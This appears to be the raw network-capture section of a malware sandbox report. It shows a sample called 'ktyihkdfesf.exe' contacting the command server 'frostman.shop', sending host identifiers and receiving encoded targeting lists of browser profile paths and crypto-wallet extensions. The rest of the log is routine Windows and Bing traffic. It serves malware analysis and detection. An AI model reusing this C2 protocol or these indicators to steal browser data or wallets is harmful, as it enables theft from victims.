                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 67 6d 6f 54 58 41 4d 50 30 4b 77 77 6c 5a 69 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 61 31 32 31 66 35 34 63 39 61 32 38 38 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: bgmoTXAMP0KwwlZi.2Context: 9aa121f54c9a2889<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 67 6d 6f 54 58 41 4d 50 30 4b 77 77 6c 5a 69 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 61 31 32 31 66 35 34 63 39 61 32 38 38 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\WNS 0 197MS-CV: bgmoTXAMP0KwwlZi.3Context: 9aa121f54c9a2889<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 34 6e 47 33 39 6a 30 35 45 2b 54 72 6a 2b 72 30 34 6f 66 39 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: Q4nG39j05E+Trj+r04of9g.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                4192.168.2.649716116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:05 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----M7YMGDTJM7G47Q16P8YU
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:05 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 37 59 4d 47 44 54 4a 4d 37 47 34 37 51 31 36 50 38 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 43 36 36 41 46 36 42 33 35 34 38 32 36 30 34 39 38 32 31 36 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 4d 47 44 54 4a 4d 37 47 34 37 51 31 36 50 38 59 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 59 4d 47 44 54 4a 4d 37 47 34 37 51 31 36 50 38 59 55 2d 2d 0d
                                                                                                                                                                                                                                                                                                Data Ascii: ------M7YMGDTJM7G47Q16P8YUContent-Disposition: form-data; name="hwid"9C66AF6B35482604982160-a33c7340-61ca------M7YMGDTJM7G47Q16P8YUContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------M7YMGDTJM7G47Q16P8YU--
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:06 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:06 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|889f5f40738c5dc3f18f9676ef06948f|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                5192.168.2.649722116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:08 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----2VSJ5XLFCBIE3E3WLFK6
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:08 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 56 53 4a 35 58 4c 46 43 42 49 45 33 45 33 57 4c 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 32 56 53 4a 35 58 4c 46 43 42 49 45 33 45 33 57 4c 46 4b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 32 56 53 4a 35 58 4c 46 43 42 49 45 33 45 33 57 4c 46 4b 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------2VSJ5XLFCBIE3E3WLFK6Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------2VSJ5XLFCBIE3E3WLFK6Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------2VSJ5XLFCBIE3E3WLFK6Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:09 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                6192.168.2.64972120.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 36 35 42 6c 41 5a 57 65 36 30 75 4d 31 4b 59 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 31 35 36 65 63 33 30 37 38 38 32 61 36 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: 65BlAZWe60uM1KYn.1Context: 11156ec307882a6d
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 36 35 42 6c 41 5a 57 65 36 30 75 4d 31 4b 59 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 31 35 36 65 63 33 30 37 38 38 32 61 36 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 65BlAZWe60uM1KYn.2Context: 11156ec307882a6d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:08 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 36 35 42 6c 41 5a 57 65 36 30 75 4d 31 4b 59 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 31 31 35 36 65 63 33 30 37 38 38 32 61 36 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: 65BlAZWe60uM1KYn.3Context: 11156ec307882a6d
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:09 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:09 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6c 37 47 6f 46 4a 47 51 6d 55 75 63 48 4f 4f 79 44 68 68 58 53 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: l7GoFJGQmUucHOOyDhhXSg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                7192.168.2.649729116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:10 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----6PZUASRIWTRIE3O8Q9HV
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:10 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 36 50 5a 55 41 53 52 49 57 54 52 49 45 33 4f 38 51 39 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 36 50 5a 55 41 53 52 49 57 54 52 49 45 33 4f 38 51 39 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 36 50 5a 55 41 53 52 49 57 54 52 49 45 33 4f 38 51 39 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------6PZUASRIWTRIE3O8Q9HVContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------6PZUASRIWTRIE3O8Q9HVContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------6PZUASRIWTRIE3O8Q9HVCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:11 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                8192.168.2.649732150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:11 UTC375OUTGET /th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 843567
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 65FEA4B0E1F24E06BACFE43FAE0F565A Ref B: EWR311000106029 Ref C: 2024-12-20T06:31:12Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC15528INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 19 f2 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 31 31 3a 31 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:11:138
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 5b 5b 13 80 c7 53 c4 52 5e f4 1a 7d ff 00 03 0a b1 a5 52 0e 0f a9 7f e0 6c a8 ff 00 0b 74 48 53 4d bb b6 ba d3 ad bf b3 2f 6d ae 65 fd f4 77 10 7c 92 a3 7d 3f 86 ba 7f f9 6d f2 57 0f 6b e3 6f 09 e9 52 ea 57 5e 4e b7 71 06 b3 a8 bd dd cf 95 76 97 3f 64 b8 54 45 66 f2 59 52 48 d1 95 7f e0 55 bb a1 f8 e3 c2 7a c4 d2 7d 96 6d 5a e3 ec f1 fe eb ca d2 5e 6f 33 fb db 19 2b 3c c3 db e2 31 55 2b ca 3a cd b7 b7 57 b9 74 5c 23 05 1b ec 74 30 41 e7 43 ff 00 3d 3c ba f3 2f da 72 ef c6 5a 3f 86 74 5d 7b c1 da c4 da 77 f6 76 ac 91 dc 4b 14 5f be fd ef ee e2 97 e6 e3 e5 f9 ab d1 74 ab 9d 37 55 9a 47 d2 e6 9a e2 38 e3 ff 00 9f 47 87 cb dd fe fe da a1 f1 0b c1 da 97 88 bc 33 ff 00 08 f3 cd 0c 9a 75 e5 cc 29 ab 7e f5 d2 6f b1 6f f3 25 48 9b 1f 7f ee 7c d4 b2 ac 54 f0 18 fa
                                                                                                                                                                                                                                                                                                Data Ascii: [[SR^}RltHSM/mew|}?mWkoRW^Nqv?dTEfYRHUz}mZ^o3+<1U+:Wt\#t0AC=</rZ?t]{wvK_t7UG8G3u)~oo%H|T
